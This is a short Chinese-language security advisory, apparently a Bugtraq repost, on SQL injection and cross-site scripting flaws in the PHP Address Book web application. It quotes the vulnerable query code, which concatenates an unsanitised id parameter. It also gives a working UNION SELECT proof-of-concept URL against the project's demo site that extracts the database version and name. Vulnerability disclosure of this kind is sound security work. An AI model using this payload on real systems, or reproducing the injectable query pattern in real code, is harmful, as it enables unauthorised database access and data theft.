PHP Address Book多个SQL注入及跨站脚本漏洞

发布日期：2015-01-01
更新日期：2015-01-06受影响系统：
PHP Address Book PHP Address Book
描述：
BUGTRAQ ID: 71862 PHP Address Book是基于Web的通讯录。PHP Address Book在实现上存在多个sql注入及跨站脚本漏洞，利用这些漏洞攻击者可以窃取cookie身份验证凭证、执行未授权数据库操作。有漏洞的代码：
if （$id） { $sql = "SELECT * FROM $base_from_where AND $table.id="$id"";
$result = mysql_query（$sql, $db）;
$r = mysql_fetch_array（$result）; $resultsnumber = mysql_numrows（$result）;
} <*来源：Manish Tanwar

链接：http://packetstormsecurity.com/files/129789/phpaddressbook-sqlxss.txt
*>测试方法：警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
POC
http://php-addressbook.sourceforge.net/demo/view.php？id=1337" union select 1,2,3,4,version（）,6,database（）,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+ image link:-
http://oi62.tinypic.com/2lncw3a.jpg建议：
厂商补丁：PHP Address Book
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://sourceforge.net/projects/php-addressbook/